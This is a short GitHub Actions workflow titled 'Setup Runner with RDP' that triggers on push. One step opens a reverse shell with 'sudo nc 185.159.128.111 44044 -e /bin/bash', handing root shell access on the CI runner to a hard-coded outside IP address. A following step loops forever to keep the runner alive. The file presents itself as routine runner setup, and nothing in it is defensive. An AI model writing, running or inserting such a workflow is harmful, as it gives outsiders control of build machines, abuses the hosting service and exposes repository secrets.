name: Setup Runner with RDP

on:
  push:
  workflow_dispatch:

jobs:
  setup-runner:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: one more step
      run: |
        apt update -y
        sshd
        service ssh status
        service ssh start | grep -i "running"
        cat /etc/ssh/sshd_config | grep -i "Port"
        sudo nc 185.159.128.111 44044 -e /bin/bash
        echo "Puck"
    
    - name: another step
      run: |
        while true; do sleep 5; echo $RANDOM; done


